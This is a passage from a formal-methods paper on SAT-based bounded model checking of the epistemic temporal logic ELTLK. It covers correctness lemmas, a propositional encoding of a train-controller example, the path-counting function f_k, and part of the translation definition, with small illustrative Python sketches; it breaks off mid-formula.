\(M,\rho '[j] \models \alpha ]\). Since \(\rho '(j)\) is reachable from the initial state of \(M\), checking \(M,\rho '[j] \models \alpha \) is equivalent to checking \(M,\rho '[0] \models \mathrm{X}^j\alpha \). Now, since \(\mathrm{X}^j\alpha \) is a pure LTL formula, by Lemma 3 we have that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k\), \(M,\pi '_l[0] \models _k \mathrm{X}^j\alpha \) with \(\rho '[..k] = \pi '\). This implies that \(M,\pi '_l[j] \models _k \alpha \) with \(\rho '[..k] = \pi '\), for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k\). Now, since \(\rho '(j) \sim _{{ c}} \rho (0)\), we have \(\pi '(j) \sim _{{ c}} \pi (0)\). Thus, by the bounded semantics we have that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k\), \(M,\pi _l \models _k {\overline{\mathrm{{K}}}}_{{ c}}\alpha \) with \(\rho [..k] = \pi \). 2. Let \(Y = {\overline{\mathrm{{D}}}}_{\varGamma }\). Then \(M,\rho \models {\overline{\mathrm{{D}}}}_{\varGamma }\alpha \) iff \(M,\rho [0] \models {\overline{\mathrm{{D}}}}_{\varGamma }\alpha \) iff \((\exists \rho ' \in \varPi (\iota ))(\exists j{\,\geqslant \,}0)\)\([\rho '(j) \sim ^\mathrm{{D}}_\varGamma \rho (0)\) and \(M,\rho '[j] \models \alpha ]\). Since \(\rho '(j)\) is reachable from the initial state of \(M\), checking \(M,\rho '[j] \models \alpha \) is equivalent to checking \(M,\rho '[0] \models \mathrm{X}^j\alpha \). Now, since \(\mathrm{X}^j\alpha \) is a pure LTL formula, by Lemma 3 we have that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k\), \(M,\pi '_l[0] \models _k \mathrm{X}^j\alpha \) with \(\rho '[..k] = \pi '\). This implies that \(M,\pi '_l[j] \models _k \alpha \) with \(\rho '[..k] = \pi '\), for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k\). Now, since \(\rho '(j) \sim ^{\mathrm{{D}}}_{\varGamma } \rho (0)\), we have \(\pi '(j) \sim ^{\mathrm{{D}}}_{\varGamma } \pi (0)\).
Thus, by the bounded semantics we have that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k\), \(M,\pi _l \models _k {\overline{\mathrm{{D}}}}_{\varGamma }\alpha \) with \(\rho [..k] = \pi \). 3. Let \(Y = {\overline{\mathrm{E}}}_{\varGamma }\). Since \({\overline{\mathrm{E}}}_{\varGamma }\alpha = \bigvee _{{ c}\in \varGamma } {\overline{\mathrm{{K}}}}_{{ c}} \alpha \), the lemma follows from case 1. 4. Let \(Y = {\overline{\mathrm{{C}}}}_{\varGamma }\). Since \({\overline{\mathrm{{C}}}}_{\varGamma }\alpha = \bigvee _{i=1}^{n} ({\overline{\mathrm{E}}}_{\varGamma })^i \alpha \), where \(n\) is the size of the model \(M\), the lemma follows from case 3. Lemma 5 Let \(M\) be a model, \(\varphi \) an ELTLK formula, and \(\rho \) a run. Then, the following implication holds: \(M,\rho \models \varphi \) implies that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k\), \(M,\pi _l \models _k \varphi \) with \(\rho [..k] = \pi \). Proof (Induction on the length of \(\varphi \)) The lemma follows directly for the propositional variables and their negations. Assume that the hypothesis holds for all the proper subformulae of \(\varphi \) and consider \(\varphi \) to be of the following form: 1. \(\varphi = \psi _1 \vee \psi _2 \mid \psi _1 \wedge \psi _2 \mid \mathrm{X}\psi \mid \psi _1 \mathrm{U}\psi _2 \mid \psi _1 \mathrm{R}\psi _2\). Straightforward by the induction hypothesis and Lemma 3. 2. Let \(\varphi =Y\alpha \), and \(Y,Y_1,\ldots ,Y_n, Z \in \{{\overline{\mathrm{{K}}}}_{{ c}}, {\overline{\mathrm{{D}}}}_{\varGamma }, {\overline{\mathrm{E}}}_{\varGamma }, {\overline{\mathrm{{C}}}}_{\varGamma }\}\). Moreover, let \(Y_1\alpha _1, \ldots ,\)\(Y_n \alpha _n\) be the list of all “top level” proper \(Y\)-subformulae of \(\alpha \) (i.e., each \(Y_i\alpha _i\) is a subformula of \(Y\alpha \), but it is not a subformula of any subformula \(Z\beta \) of \(Y\alpha \), where \(Z\beta \) is different from \(Y\alpha \) and from \(Y_i\alpha _i\) for \(i=1, \ldots , n\)). If this list is empty, then \(\alpha \) is a “pure” LTL formula with no nested epistemic modalities. Hence, by Lemma 4, \(M,\rho \models \varphi \) implies that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k\), \(M,\pi _l \models _k \varphi \) with \(\rho [..k] = \pi \). Otherwise, introduce for each \(Y_i\alpha _i\) a new proposition \(q_i\), where \(i=1,\ldots ,n\). By Lemma 1, we can augment with \(q_i\) the labelling of each state \(s\) of \(M\) initialising some run along which the epistemic formula \(Y_i\alpha _i\) holds, and then translate the formula \(\alpha \) to the formula \(\alpha '\), which instead of each subformula \(Y_i\alpha _i\) contains the adequate proposition \(q_i\). Therefore, we obtain a “pure” LTL formula. Hence, by Lemma 4, \(M,\rho \models \varphi \) implies that for some \(k{\,\geqslant \,}0\) and \(0 {\,\leqslant \,}l {\,\leqslant \,}k\), \(M,\pi _l \models _k \varphi \) with \(\rho [..k] = \pi \). The following lemma states that if we take all possible bounds into account, then the bounded and unbounded semantics are equivalent. Lemma 6 Let \(M\) be a model and \(\varphi \) an ELTLK formula. Then the following equivalence holds: \(M \models ^{\exists } \varphi \) iff there exists \(k{\,\geqslant \,}0\) such that \(M \models ^{\exists }_{k} \varphi \). Proof (“\(\Leftarrow \)”) Follows directly from Lemma 2. (“\(\Rightarrow \)”) Follows directly from Lemma 5.
3.2.3 Translation to the propositional satisfiability problem Let \(M =(G,\iota ,T,\{\sim _{{ c}}\}_{{{ c}} \in \mathcal{A }},\mathcal{V })\) be a model generated by an IS or an IIS (the encoding of global states of \(M\) is independent of the kind of interpreted system considered), and let \(k \in \mathrm{I\!N}\) be a bound. Since the set of global states of \(M\) is finite, every element \(g=(\ell _1,\ldots ,\ell _n,\ell _{{e}})\) of \(G\) can be encoded as a bit vector of some length \(r\). Then, each state of \(M\) can be represented by a valuation of a vector \(w=(\mathtt{w}_1, \ldots , \mathtt{w}_r)\) (called a symbolic state) of distinct propositional variables called state variables. Further, we assume that \(SV\) denotes the set of all the state variables, \(SV(w)\) denotes the set of all the state variables occurring in the symbolic state \(w\), and \(I_{{ c}}\) denotes the set of indices of the state variables that represent the local states of agent \({ c}\). Example 1 Let \(SV=\{\mathtt{w}_1,\mathtt{w}_2,\ldots \}\) be an infinite set of state variables. Consider the FTC system shown in Fig. 1 for two trains. A propositional encoding of all the local states of the two agents representing the trains and of the agent representing the Controller is the following:
\(Train\;1\): \(State\) | \(Bit_2\) | \(Bit_1\) | \(Formula\)
\(Away_1\) | 0 | 0 | \(\lnot \mathtt{w}_1 \wedge \lnot \mathtt{w}_2\)
\(Wait_1\) | 1 | 0 | \(\lnot \mathtt{w}_1 \wedge \mathtt{w}_2\)
\(Tunnel_1\) | 0 | 1 | \(\mathtt{w}_1 \wedge \lnot \mathtt{w}_2\)
\(Train\;2\): \(State\) | \(Bit_4\) | \(Bit_3\) | \(Formula\)
\(Away_2\) | 0 | 0 | \(\lnot \mathtt{w}_3 \wedge \lnot \mathtt{w}_4\)
\(Wait_2\) | 1 | 0 | \(\lnot \mathtt{w}_3 \wedge \mathtt{w}_4\)
\(Tunnel_2\) | 0 | 1 | \(\mathtt{w}_3 \wedge \lnot \mathtt{w}_4\)
\(Controller\): \(Location\) | \(Bit_5\) | \(Formula\)
\(Green\) | 0 | \(\lnot \mathtt{w}_5\)
\(Red\) | 1 | \(\mathtt{w}_5\)
Thus, given the above, it is easy to see that each state of the model of the FTC system can be represented by a valuation of a symbolic state \(w = (\mathtt{w}_1, \ldots , \mathtt{w}_5)\). Let \(NV\) denote the set of propositional variables, called the natural variables, such that \(SV \cap NV = \emptyset \). Moreover, let \(u = (\mathtt{u}_1 , \ldots , \mathtt{u}_t )\) be a vector of natural variables of some length \(t\), which we call a symbolic number, and let \(NV(u)\) denote the set of all the natural variables occurring in \(u\). Further, let \(PV = SV \cup NV\) and \(V: PV \rightarrow \{0,1\}\) be a valuation of propositional variables (a valuation for short). Each valuation induces the functions \({\mathbf{S}}: SV^r \rightarrow \{0,1\}^r\) and \(\mathbf{J}: NV^t \rightarrow \mathrm{I\!N}\) defined in the following way: $$\begin{aligned} {\mathbf{S}}((\mathtt{w}_{1},\ldots , \mathtt{w}_{r}))&= (V(\mathtt{w}_{1}),\ldots , V(\mathtt{w}_{r}))\end{aligned}$$ (1) $$\begin{aligned} {\mathbf{J}}((\mathtt{u}_{1},\ldots , \mathtt{u}_{t}))&= \sum _{i=1}^t V(\mathtt{u}_{i})\cdot 2^{i-1} \end{aligned}$$ (2) Now let \(w\) and \(w'\) be two symbolic states such that \(SV(w) \cap SV(w') = \emptyset \), and let \(u\) be a symbolic number. We recall the definitions of the following auxiliary propositional formulae: • \(I_g(w):{=} \bigwedge _{i=1}^r lit(g[i],\mathtt{w}_i)\), where \(lit: \{0,1\}\times PV \rightarrow PV \cup \{ \lnot q \mid q \in PV \}\) is a function defined as: \(lit(1,q)=q\) and \(lit(0,q)= \lnot q\). This formula, defined over \(SV(w)\), encodes the state \(g\) of the model \(M\).
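As a small illustration, the following Python sketch (hypothetical helper names, formulae built as plain strings) realises \(lit\) and \(I_g(w)\), and reproduces the encoding of Example 2, which follows.

```python
def lit(bit, q):
    # lit(1, q) = q and lit(0, q) = "not q", as in the definition above
    return q if bit else "~" + q

def I(g, w):
    """The formula I_g(w): a conjunction of literals fixing the
    symbolic state w to the bit vector g."""
    return " & ".join(lit(b, q) for b, q in zip(g, w))

# the initial FTC state (all local states encoded by 0-bits):
print(I((0, 0, 0, 0, 0), ("w1", "w2", "w3", "w4", "w5")))
# -> ~w1 & ~w2 & ~w3 & ~w4 & ~w5
```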
Example 2 Consider the FTC system shown in Fig. 1 for two trains. Then, the propositional formula \(I_{\iota }(w)\), which encodes the initial global state of the system, is defined as follows: \(I_{\iota }(w)= \lnot \mathtt{w}_1 \wedge \lnot \mathtt{w}_2 \wedge \lnot \mathtt{w}_3 \wedge \lnot \mathtt{w}_4 \wedge \lnot \mathtt{w}_5\). • \(H(w,w') :{=} \bigwedge _{i=1}^r \mathtt{w}_i \Leftrightarrow \mathtt{w'}_i \). This formula, defined over \(SV(w) \cup SV(w')\), encodes the equivalence of two symbolic states: it represents the fact that the symbolic states \(w\) and \(w'\) represent the same state. • \(H_{{ c}}(w,w'):{=} \bigwedge _{i\in I_{{ c}} } \mathtt{w}_i \Leftrightarrow \mathtt{w'}_i \). This formula, defined over \(SV(w) \cup SV(w')\), represents the fact that the local states of agent \({ c}\) are the same in the symbolic states \(w\) and \(w'\). • \(p(w)\) is a formula over \(SV(w)\) that is true for a valuation \(V\) iff \(p \in {\mathcal{V }}(\mathbf{S}(w))\). This formula encodes the set of states of \(M\) in which the propositional variable \(p \in \mathcal{PV }\) holds. • \({\mathcal{R }}(w,w')\) is a formula over \(SV(w) \cup SV(w')\) that is true for a valuation \(V\) iff \((\mathbf{S}(w), \mathbf{S}(w')) \in T\). This formula encodes the transition relation of \(M\). The formal definition of this formula is different for a model \(M\) generated by an IS and for one generated by an IIS. • \({\mathcal{B }}_j^{\thicksim }(u)\) is a formula over \(NV(u)\) that is true for a valuation \(V\) iff \(j \thicksim \mathbf{J}(u)\), where \(\thicksim \in \{<,>,\leqslant ,=,\geqslant \}\). Let \(M =(G,\iota ,T,\{\sim _{{ c}}\}_{{{ c}} \in \mathcal{A }},\mathcal{V })\) be a model, \(\varphi \) an ELTLK formula, and \(k{\,\geqslant \,}0\) a bound. We translate the problem of checking whether \(M \models ^{\exists }_{k} \varphi \) to the problem of checking the satisfiability of the following propositional formula: $$\begin{aligned}{}[M,\varphi ]_{k} \,{:=}\, [M^{\varphi ,\iota }]_k \; \wedge \; [\varphi ]_{M,k} \end{aligned}$$ (3) In order to define the formula \([M^{\varphi ,\iota }]_k\) we need to specify the number of \(k\)-paths of the model \(M\) that are sufficient to validate \(\varphi \). To calculate this number, we need the following auxiliary function \(f_k : {\mathrm{ELTLK }}\rightarrow \mathrm{I\!N}\): • \(f_k({{true}}) = f_k({false}) = f_k(p) =f_k(\lnot p)= 0\), if \(p \in \mathcal{PV }\), • \(f_k(\varphi \vee \psi ) = max\{f_k(\varphi ) , f_k(\psi )\}\), • \(f_k(\varphi \wedge \psi ) = f_k(\varphi ) + f_k(\psi )\), • \(f_k(\mathrm{X}\varphi ) = f_k(\varphi )\), • \(f_k(\varphi \mathrm{U}\psi ) = k \cdot f_k(\varphi ) + f_k(\psi )\), • \(f_k(\varphi \mathrm{R}\psi ) = (k+1) \cdot f_k(\psi )+ f_k(\varphi )\), • \(f_k(\overline{Y} \varphi ) = f_k(\varphi ) +1\), for \(\overline{Y} \in \{{\overline{\mathrm{{K}}}}_{{ c}}, {\overline{\mathrm{{D}}}}_\varGamma , {\overline{\mathrm{E}}}_\varGamma \}\), • \(f_k({\overline{\mathrm{{C}}}}_\varGamma \varphi ) = f_k(\varphi ) + k\). Note that \({\overline{\mathrm{{C}}}}_\varGamma \varphi = \bigvee _{i=1}^{k} ({\overline{\mathrm{E}}}_\varGamma )^i\varphi \) and \(f_k(({\overline{\mathrm{E}}}_\varGamma )^1\varphi ) =f_k({\overline{\mathrm{E}}}_\varGamma \varphi ) = f_k(\varphi ) + 1\). It is easy to show, by induction on \(i\), that \(f_k(({\overline{\mathrm{E}}}_\varGamma )^i\varphi ) = f_k(\varphi ) + i\), for \(i \in \{1, \ldots ,k\}\). Therefore, \(f_k({\overline{\mathrm{{C}}}}_\varGamma \varphi )=f_k(\bigvee _{i=1}^{k} ({\overline{\mathrm{E}}}_\varGamma )^i\varphi )=max\{f_k(({\overline{\mathrm{E}}}_\varGamma )^1\varphi ), \ldots , f_k(({\overline{\mathrm{E}}}_\varGamma )^k\varphi )\}=f_k(({\overline{\mathrm{E}}}_\varGamma )^k\varphi )=f_k(\varphi )+k\).
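The function \(f_k\) is a straightforward structural recursion. The sketch below (with the same hypothetical tuple encoding of formulae as in the earlier sketches) computes it and reproduces the third calculation of Example 3, which follows.

```python
def f(phi, k):
    """The function f_k: the number of auxiliary k-paths needed for phi."""
    op = phi[0]
    if op in ('true', 'false', 'ap', 'nap'):
        return 0
    if op == 'and':
        return f(phi[1], k) + f(phi[2], k)
    if op == 'or':
        return max(f(phi[1], k), f(phi[2], k))
    if op == 'X':
        return f(phi[1], k)
    if op == 'U':
        return k * f(phi[1], k) + f(phi[2], k)
    if op == 'R':
        return (k + 1) * f(phi[2], k) + f(phi[1], k)
    if op in ('K', 'D', 'E'):
        return f(phi[-1], k) + 1
    if op == 'C':
        return f(phi[-1], k) + k
    raise ValueError(op)

# GF(K_c p), written with G a = false R a and F a = true U a:
phi = ('R', ('false',), ('U', ('true',), ('K', 'c', ('ap', 'p'))))
assert f(phi, 1) + 1 == 3     # \hat{f}_k = f_k + 1 gives k + 2 for k = 1
```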
Now, since in the BMC method we deal with the existential validity \((\models ^{\exists })\), the number of \(k\)-paths sufficient to validate \(\varphi \) is given by the function \(\widehat{f_k} : {\mathrm{ELTLK }}\rightarrow \mathrm{I\!N}\) defined as \(\widehat{f_k}(\varphi ) = f_k(\varphi ) + 1\). Example 3 Let \(p\in \mathcal{PV }\) and let \(k\) be a bound. We now calculate the number of \(k\)-paths that are sufficient to validate different ELTLK formulae. • Let \(\varphi =\mathrm{F}p \). Then, \(\widehat{f_k}(\mathrm{F}p)= f_k(\mathrm{F}p)+1=f_k(p)+1= 1\); note that \(\mathrm{F}\alpha = {{true}}\mathrm{U}\alpha \). • Let \(\varphi =\mathrm{G}\mathrm{F}p \). Then, \(\widehat{f_k}(\mathrm{G}\mathrm{F}p)= f_k(\mathrm{G}\mathrm{F}p)+1= (k+1) \cdot f_k(\mathrm{F}p)+1= (k+1) \cdot f_k(p)+1= 1\); note that \(\mathrm{G}\alpha = {false}\mathrm{R}\alpha \). • Let \(\varphi =\mathrm{G}\mathrm{F}{\overline{\mathrm{{K}}}}_{{ c}}\!p\). Then, \(\widehat{f_k}(\mathrm{G}\mathrm{F}{\overline{\mathrm{{K}}}}_{{ c}}\!p) =f_k(\mathrm{G}\mathrm{F}{\overline{\mathrm{{K}}}}_{{ c}}\!p)+1 =(k+1) \cdot f_k(\mathrm{F}{\overline{\mathrm{{K}}}}_{{ c}}\!p)+1 =(k+1) \cdot f_k({\overline{\mathrm{{K}}}}_{{ c}}\!p)+1 =(k+1) \cdot (f_k(p)+1)+1 =(k+1) \cdot 1+1 = k+2\). An example of a model and a witness for the formula is shown in Fig. 13. Observe that while the value \(\widehat{f_1}(\varphi )\) is 3, and the witness for \(\varphi \) can be of the form shown in Fig. 13b, there is a witness for \(\varphi \) which consists of two 1-paths only; see Fig. 13c. Thus, one can observe that the function \(\widehat{f_k}\) only gives an upper bound on the number of \(k\)-paths that form a witness for an ELTLK formula.
Fig. 13 Illustration of the function \(f_k\) for \(k=1\) and the formula \(\varphi =\mathrm{G}\mathrm{F}{\overline{\mathrm{{K}}}}_{{ c}} p\). In Fig. 13b we assume that \(\alpha ={\overline{\mathrm{{K}}}}_{{ c}} p\). a A model \(M\). b Three different 1-paths of \(M\). c Two different 1-paths of \(M\)
Let \(W=\{SV(w_{i,j}) \mid 0 {\,\leqslant \,}i {\,\leqslant \,}k\text { and } 1 {\,\leqslant \,}j {\,\leqslant \,}\widehat{f_k}(\varphi )\} \cup \{NV(u_j) \mid 1 {\,\leqslant \,}j {\,\leqslant \,}\widehat{f_k}(\varphi )\}\) be a set of propositional variables. The propositional formula \([M^{\varphi ,\iota }]_k\) is defined over the set \(W\) in the following way: $$\begin{aligned}&[M^{\varphi ,\iota }]_{k} \,{:=}\, I_{\iota }(w_{0,0})\wedge \bigvee _{j=1}^{\widehat{f_k}(\varphi )} H(w_{0,0},w_{0,j})\wedge \bigwedge _{j=1}^{\widehat{f_k}(\varphi )} \bigwedge ^{k-1}_{i=0} {\mathcal{R }}(w_{i,j}, w_{i+1,j}) \wedge \nonumber \\&\quad \quad \quad \quad \quad \quad \bigwedge _{j=1}^{\widehat{f_k}(\varphi )} \bigvee _{l=0}^{k} {\mathcal{B }}_l^{=}(u_{j}) \end{aligned}$$ (4) where \(w_{i,j}\) and \(u_j\) are, respectively, symbolic states and symbolic numbers for \(0{\,\leqslant \,}i {\,\leqslant \,}k\) and \(1 {\,\leqslant \,}j {\,\leqslant \,}\widehat{f_k}(\varphi )\). Note that formula (4) encodes \(\widehat{f_k}(\varphi )\) valid \(k\)-paths of the model \(M\) that start at the initial state \(\iota \).
In particular, the formula defines \(\widehat{f_k}(\varphi )\) symbolic \(k\)-paths such that the \(j\)-th symbolic \(k\)-path \({\varvec{\pi }}_j\) is of the form \(((w_{0,j},\ldots ,w_{k,j}),u_j)\), where \(w_{i,j}\) is a symbolic state for \(1 {\,\leqslant \,}j {\,\leqslant \,}\widehat{f_k}(\varphi )\) and \(0 {\,\leqslant \,}i {\,\leqslant \,}k\), and \(u_j\) is a symbolic number for \(1 {\,\leqslant \,}j {\,\leqslant \,}\widehat{f_k}(\varphi )\). The next step is a translation of an ELTLK formula \(\varphi \) to a propositional formula $$\begin{aligned}{}[\varphi ]_{M,k} :{=} [\varphi ]^{[0,1,F_k(\varphi )]}_{k} \end{aligned}$$ (5) where \(F_k(\varphi ) = \{j \in \mathrm{I\!N}\;|\;1 {\,\leqslant \,}j {\,\leqslant \,}\widehat{f_k}(\varphi )\}\), and \([\varphi ]^{[m,n,A]}_k\) denotes the translation of \(\varphi \) along the \(n\)-th symbolic path \({\varvec{\pi }}^m_n\) with the starting point \(m\) by using the set \(A \subseteq F_k(\varphi )\). For every ELTLK formula \(\varphi \) the function \(\widehat{f_k}\) determines how many symbolic \(k\)-paths are needed to translate the formula \(\varphi \). Given a formula \(\varphi \) and a set \(A\) of \(k\)-paths such that \(|A| = \widehat{f_k}(\varphi )\), we divide the set \(A\) into subsets needed for translating the subformulae of \(\varphi \). To accomplish this goal we need some auxiliary functions that were defined in [55]; we recall their definitions. First, the relation \(\prec \) is defined on the power set of \(\mathrm{I\!N}\) as follows: \(A \prec B\) iff for all natural numbers \(x\) and \(y\), if \(x \in A\) and \(y \in B\), then \(x < y\). Now, let \(A \subset \mathrm{I\!N}\) be a finite nonempty set, and \(n, d \in \mathrm{I\!N}\), where \(d \leqslant |A|\). Then, • \(g_l(A, d)\) denotes the subset \(B\) of \(A\) such that \(|B| = d\) and \(B \prec A \setminus B\), e.g., \(g_l(\{4,5,6,7,8\}, 3) = \{4,5,6\}\). • \(g_r(A, d)\) denotes the subset \(C\) of \(A\) such that \(|C| = d\) and \(A \setminus C \prec C\), e.g., \(g_r(\{4,5,6,7,8\}, 3) = \{6,7,8\}\). • \(g_s(A)\) denotes the set \(A \setminus \{min(A)\}\), e.g., \(g_{s}(\{4,5,6,7,8\}) = \{5,6,7,8\}\). • if \(n\) divides \(|A| - d\), then \(hp(A, d, n)\) denotes the sequence \((B_0, \ldots , B_{n})\) of subsets of \(A\) such that \(\bigcup _{j=0}^{n} B_j = A\), \(|B_0| = \ldots = |B_{n-1}|\), \(|B_{n}| = d\), and \(B_i \prec B_j\) for every \(0 \;{\,\leqslant \,}\; i < j {\,\leqslant \,}n\). Now let \({{h}_{k}^{\mathrm{U}}}(A, d)\) := \(hp(A, d, k)\) and \({{h}_{k}^{\mathrm{R}}}(A,d)\) := \(hp(A,d,k+1)\). Note that if \({{h}_{k}^{\mathrm{U}}}(A, d) = (B_0, \ldots , B_{k})\), then \({{h}_{k}^{\mathrm{U}}}(A, d)(j)\) denotes the set \(B_j\), for every \(0 {\,\leqslant \,}j {\,\leqslant \,}k\). Similarly, if \({{h}_{k}^{\mathrm{R}}}(A, d) = (B_0, \ldots , B_{k+1})\), then \({{h}_{k}^{\mathrm{R}}}(A, d)(j)\) denotes the set \(B_j\), for every \(0 \leqslant j \leqslant k + 1\). For example, if \(A \!=\! \{1,2,3,4,5,6\}\), then \(h_3^{\mathrm{U}}(A, 0) \!=\! (\{1,2\},\{3,4\},\{5,6\},\emptyset )\), \(h_3^{\mathrm{U}}(A, 3) = (\{1\},\{2\},\{3\},\{4,5,6\})\), \(h_3^{\mathrm{U}}(A, 6) = (\emptyset ,\emptyset , \emptyset ,\{1,2,3,4,5,6\})\), and \(h_3^{\mathrm{U}}(A, d)\) is undefined for \(d \in \{0,\ldots ,6\} \setminus \{0, 3,6\}\). Next, \(h_3^{\mathrm{R}}(A, 2) = (\{1\},\{2\},\{3\},\{4\},\{5,6\})\), \(h_3^{\mathrm{R}}(A, 6) = (\emptyset ,\emptyset , \emptyset ,\emptyset ,\{1,2,3,4,5,6\})\), and \(h_3^{\mathrm{R}}(A, d)\) is undefined for \(d \in \{0,\ldots ,6\} \setminus \{2,6\}\).
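These combinators are short enough to state as runnable Python; the following is a sketch under the same assumptions as before, with sorted order standing in for the relation \(\prec \).

```python
def g_l(A, d):
    # the d smallest elements of A
    return set(sorted(A)[:d])

def g_r(A, d):
    # the d largest elements of A
    return set(sorted(A)[-d:]) if d else set()

def g_s(A):
    # A without its minimum
    return A - {min(A)}

def hp(A, d, n):
    """The sequence (B_0, ..., B_n): n equal-sized blocks followed by a
    block of size d; defined only when n divides |A| - d."""
    if (len(A) - d) % n:
        raise ValueError("n must divide |A| - d")
    size = (len(A) - d) // n
    xs = sorted(A)
    return tuple(set(xs[i * size:(i + 1) * size]) for i in range(n)) \
        + (set(xs[n * size:]),)

A = {1, 2, 3, 4, 5, 6}
assert hp(A, 3, 3) == ({1}, {2}, {3}, {4, 5, 6})      # h_3^U(A, 3)
assert hp(A, 2, 4) == ({1}, {2}, {3}, {4}, {5, 6})    # h_3^R(A, 2)
```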
The functions \(g_l\) and \(g_r\) are used in the translation of formulae whose main connective is either conjunction or disjunction: for a given ELTLK formula \(\varphi \wedge \psi \), if the set \(A\) is used to translate this formula, then the set \(g_l(A, f_k(\varphi ))\) is used to translate the subformula \(\varphi \) and the set \(g_r(A, f_k(\psi ))\) is used to translate the subformula \(\psi \); for a given ELTLK formula \(\varphi \vee \psi \), if the set \(A\) is used to translate this formula, then the set \(g_l(A, f_k(\varphi ))\) is used to translate the subformula \(\varphi \) and the set \(g_l(A, f_k(\psi ))\) is used to translate the subformula \(\psi \). The function \(g_{s}\) is used in the translation of formulae whose main connective is \(\mathrm{{Q}}\in \{{\overline{\mathrm{{K}}}}_{{ c}},{\overline{\mathrm{{D}}}}_{\varGamma },{\overline{\mathrm{E}}}_{\varGamma }\}\): for a given ELTLK formula \(\mathrm{{Q}}\varphi \), if the set \(A\) is to be used to translate this formula, then the path with the number \(min(A)\) is used to translate the operator \(\mathrm{{Q}}\) and the set \(g_{s}(A)\) is used to translate the subformula \(\varphi \). The function \({{h}_{k}^{\mathrm{U}}}\) is used in the translation of subformulae of the form \(\varphi \mathrm{U}\psi \): if the set \(A\) is to be used to translate the subformula \(\varphi \mathrm{U}\psi \) along the symbolic \(k\)-path \({\varvec{\pi }}_n\) (with the starting point \(m\)), then for every \(j\) such that \(m {\,\leqslant \,}j {\,\leqslant \,}k\), the set \({{h}_{k}^{\mathrm{U}}}(A, f_k(\psi ))(k)\) is used to translate the formula \(\psi \) along the symbolic path \({\varvec{\pi }}_n\) with starting point \(j\); moreover, for every \(i\) such that \(m {\,\leqslant \,}i < j\), the set \({{h}_{k}^{\mathrm{U}}}(A, f_k(\psi ))(i)\) is used to translate the formula \(\varphi \) along the symbolic path \({\varvec{\pi }}_n\) with starting point \(i\). Notice that if \(k\) does not divide \(|A| - d\), then \({{h}_{k}^{\mathrm{U}}}(A, d)\) is undefined. However, for every set \(A\) such that \(|A| = f_k(\varphi \mathrm{U}\psi )\), it is clear from the definition of \(f_k\) that \(k\) divides \(|A| - f_k(\psi )\). The function \({{h}_{k}^{\mathrm{R}}}\) is used in the translation of subformulae of the form \(\varphi \mathrm{R}\psi \): if the set \(A\) is used to translate the subformula \(\varphi \mathrm{R}\psi \) along a symbolic \(k\)-path \({\varvec{\pi }}_n\) (with the starting point \(m\)), then for every \(j\) such that \(m {\,\leqslant \,}j {\,\leqslant \,}k\), the set \({{h}_{k}^{\mathrm{R}}}(A, f_k(\varphi ))(k+1)\) is used to translate the formula \(\varphi \) along the symbolic path \({\varvec{\pi }}_n\) with starting point \(j\); moreover, for every \(i\) such that \(m {\,\leqslant \,}i {\,\leqslant \,}j\), the set \({{h}_{k}^{\mathrm{R}}}(A,f_k(\varphi ))(i)\) is used to translate the formula \(\psi \) along the symbolic path \({\varvec{\pi }}_n\) with starting point \(i\). Notice that if \(k + 1\) does not divide \(|A| - d\), then \({{h}_{k}^{\mathrm{R}}}(A, d)\) is undefined. However, for every set \(A\) such that \(|A| = f_k(\varphi \mathrm{R}\psi )\), it is clear from the definition of \(f_k\) that \(k + 1\) divides \(|A| - f_k(\varphi )\).
Definition 5 (Translation of the ELTLK formulae) Let \(M\) be a model, \(\varphi \) an ELTLK formula, and \(k \geqslant 0\) a bound. We define inductively the translation of \(\varphi \) over a path number \(n \in F_k(\varphi )\) starting at the symbolic state \(w_{m,n}\) as shown below, where \(n'=min(A)\), \({{h}_{k}^{\mathrm{U}}}={{h}_{k}^{\mathrm{U}}}(A,f_k(\psi _2))\), and \({{h}_{k}^{\mathrm{R}}}={{h}_{k}^{\mathrm{R}}}(A,f_k(\psi _1))\). We assume that \({\mathcal{L}}_k^l({\varvec{\pi }}_n) := {\mathcal{B}}_l^{=}(u_n)\wedge H(w_{k,n}, w_{l,n})\).

$$\begin{aligned} \begin{array}{lll}
{[{{true}}]}^{[m,n,A]}_{k} &:=& {{true}},\\
{[{false}]}^{[m,n,A]}_{k} &:=& {false},\\
{[p]}^{[m,n,A]}_{k} &:=& p(w_{m,n}),\\
{[\lnot p]}^{[m,n,A]}_{k} &:=& \lnot p(w_{m,n}),\\
{[\psi _1 \wedge \psi _2 ]}^{[m,n,A]}_{k} &:=& {[\psi _1]}^{[m,n,g_l(A, f_k(\psi _1))]}_{k} \wedge {[\psi _2]}^{[m,n,g_r(A, f_k(\psi _2))]}_{k},\\
{[\psi _1 \vee \psi _2 ]}^{[m,n,A]}_{k} &:=& {[\psi _1]}^{[m,n,g_l(A, f_k(\psi _1))]}_{k}\vee {[\psi _2]}^{[m,n,g_l(A, f_k(\psi _2))]}_{k},\\
{[\mathrm{X}\psi ]}^{[m,n,A]}_{k} &:=& {\left\{ \begin{array}{ll} [\psi ]^{[m+1,n,A]}_{k}, &{} \text { if } m < k \\ \bigvee \nolimits _{l=0}^{k-1}({\mathcal{L}}_{k}^{l}({\varvec{\pi }}_{n})\wedge [\psi ]^{[l+1,n,A]}_{k}), &{} \text { if } m = k\\ \end{array}\right. } \\
{[\psi _1 \mathrm{U}\psi _2]}^{[m,n,A]}_{k} &:=& \bigvee \nolimits _{j=m}^{k}([\psi _2]^{[j,n,{{h}_{k}^{\mathrm{U}}}(k)]}_{k} \wedge \bigwedge \nolimits _{i=m}^{j-1}[\psi _1]^{[i,n,{{h}_{k}^{\mathrm{U}}}(i)]}_{k})\\
&& \vee (\bigvee \nolimits _{l=0}^{m-1}({\mathcal{L}}_{k}^l({\varvec{\pi }}_{n}))\wedge \bigvee \nolimits _{j=0}^{m-1} ({\mathcal{B}}_j^{>}(u_n) \wedge [\psi _2]^{[j,n,{{h}_{k}^{\mathrm{U}}}(k)]}_{k}\\
